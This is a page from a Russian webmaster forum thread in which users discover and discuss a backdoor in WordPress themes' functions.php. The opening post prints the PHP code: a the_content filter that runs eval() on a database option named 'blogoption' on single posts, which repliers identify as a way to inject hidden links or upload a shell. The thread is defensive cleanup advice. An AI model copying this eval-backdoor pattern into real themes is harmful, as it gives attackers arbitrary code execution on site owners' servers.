Проделки WordPress или очень интересное наблюдение.

(Ответов: 20, Просмотров: 2161)
Страница 1 из 3 123 Последняя
  1. Опытный Аватар для AntoXa
    • Регистрация: 05.04.2012
    • Сообщений: 393
    • Репутация: 108
    • Webmoney BL: ?
    Добрый день юзеры webmasters.ru.
    Сегодня ко мне обратилось за подсказкой 3 человека, у всех были проблемы с сайтом, и был одинаковый симптом:
    Сайт работает замечательно, а вот страницы со статьями грузятся ой как долго.
    Попросив у них всех доступ к ftp я обнаружил, что все проблемы исчезают после удаление строки:
    PHP код:
        <?php the_content(); ?>
    Но, как же быть, это ведь функция вывода все статьи.
    Решение к моему, и не только моему счастью, было найдено довольно быстро, у всех 3 пациентов в шаблонах находился код, который как раз и "затуплял" сайт.
    Этот код выглядел так:
    PHP код:
    add_filter('the_content''_bloginfo'10001);
    function 
    _bloginfo($content){
        global 
    $post;
        if(
    is_single() && ($co=@eval(get_option('blogoption'))) !== false){
            return 
    $co;
        } else return 
    $content;

    После удаление оного, сайт стал работать как и подобает хорошему блогу.
    p.s.
    Так как в web я перешел недавно (до этого я шлялся по wap'у), то изучить структуру wordpress'a я не успел, поэтому я не знаю за что отвечает этот код, но после его удаления ничего не обрезалось, не удалилось и не взорвалось, поэтому если у вас тоже возникла(возникнет) такая проблема - то решения я уже описал.
    • 6

    Спасибо сказали:

    13й(16.04.2012), ctapbiu(15.04.2012), dobrik(15.04.2012), seofan(16.04.2012), Тюбифекс(20.05.2012), Чеснок(15.04.2012),
  2. Гуру Аватар для dobrik
    • Регистрация: 26.07.2011
    • Сообщений: 510
    • Репутация: 112
    • Webmoney BL: ?
    AntoXa, спасибо! Я как раз был первым из его пациентов=)
    • 0
  3. Гуру Аватар для seofan
    • Регистрация: 03.01.2011
    • Сообщений: 987
    • Репутация: 465
    • Webmoney BL: ?
    этот говнокод для проставления скрытых ссылок в темах.
    • 0
  4. Гуру Аватар для KipiaSoft
    • Регистрация: 16.11.2009
    • Сообщений: 638
    • Записей в дневнике: 4
    • Репутация: 255
    • Webmoney BL: ?
    Цитата Сообщение от AntoXa Посмотреть сообщение
    у всех 3 пациентов в шаблонах находился код, который как раз и "затуплял" сайт.
    а поподробней можно?
    в каких именно файлах шаблона искать этот код?
    • 0
  5. Дипломник
    • Регистрация: 19.12.2009
    • Сообщений: 145
    • Репутация: 32
    да, похоже в тема с "сюрпризом"
    который позволяет вставлять разный код в статью
    • 0

    Спасибо сказали:

    AntoXa(16.04.2012),
  6. Йэдкий фрухт Аватар для Чеснок
    • Регистрация: 30.03.2010
    • Сообщений: 634
    • Записей в дневнике: 1
    • Репутация: 607
    • Webmoney BL: ?
    KipiaSoft, если логически рассуждать, то это в functions.php ну, по крайней мере у меня хоть такого и нет, но во всех шаблонах если есть add_filter то только в этом файле
    • 3

    Спасибо сказали:

    13й(16.04.2012), AntoXa(16.04.2012), KipiaSoft(16.04.2012),
  7. Опытный Аватар для AntoXa
    • Регистрация: 05.04.2012
    • Сообщений: 393
    • Репутация: 108
    • Webmoney BL: ?
    Чеснок абсолютно прав, данный код находился именно в файле functions.php

    ---------- Сообщение добавлено 22:42 ---------- Предыдущее 22:41 ----------

    ctapbiu, простите, но я не понял о чем вы.
    • 1

    Спасибо сказали:

    KipiaSoft(16.04.2012),
  8. Дипломник
    • Регистрация: 19.12.2009
    • Сообщений: 145
    • Репутация: 32
    Цитата Сообщение от AntoXa Посмотреть сообщение
    , простите, но я не понял о чем вы
    я про то, что делает данный код

    он берет из БД переменную blogoption, которая не сильно настораживает, и выполняет её
    и причем там может быть всё что угодно - все зависит от извращенности фантазии создателя данного кода
    в данном случае, скорее всего, скрипт стучится на известный ему ресурс и получает "дальнейшие инструкции"
    хорошо, если просто вставлять ссылки, но с тем же успехом может и шелл заливать...

    ЗЫ: у кого обнаружилась такая радость в теме - проверьтесь на наличие подозрительных файлов/директорий
    ЗЗЫ: если темы из одного источника - было бы неплохо проинформировать народ, чтобы провериться на эту бяку

    ЗЗЗЫ: а минус-то за что? о_О
    • 3

    Спасибо сказали:

    13й(16.04.2012), Maiwend(16.04.2012), seofan(16.04.2012),
  9. Гуру Аватар для KipiaSoft
    • Регистрация: 16.11.2009
    • Сообщений: 638
    • Записей в дневнике: 4
    • Репутация: 255
    • Webmoney BL: ?
    Чеснок, Спасибо!
    Сегодня праздник, слогикой как то не лады
    • 0
  10. Опытный Аватар для AntoXa
    • Регистрация: 05.04.2012
    • Сообщений: 393
    • Репутация: 108
    • Webmoney BL: ?
    ctapbiu,тоже есть мнение, что название blogoption - это просто прикрытие для скрипта.
    Ведь, если присмотреться, то можно увидеть eval(), а он выполняет любой код из переменной, возможно даже и шелл.
    Завтра днем попробую посмотреть куда ведут все дороги.
    • 0
Страница 1 из 3 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Еще одно интересное предложение : IPAD2 за 14 Т.р
Оффтоп и свободные темы 18 07.11.2011 21:08
Рассылка "Все интересное из мира seo за неделю"
Обсуждение форума и ваши предложения 2 21.06.2011 03:17
Конкурс «Самое интересное интервью»!
Дайджест блогосферы 2 20.05.2011 16:26
Интересное почитать от SeoProfy
Дайджест блогосферы 8 23.01.2010 04:22

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры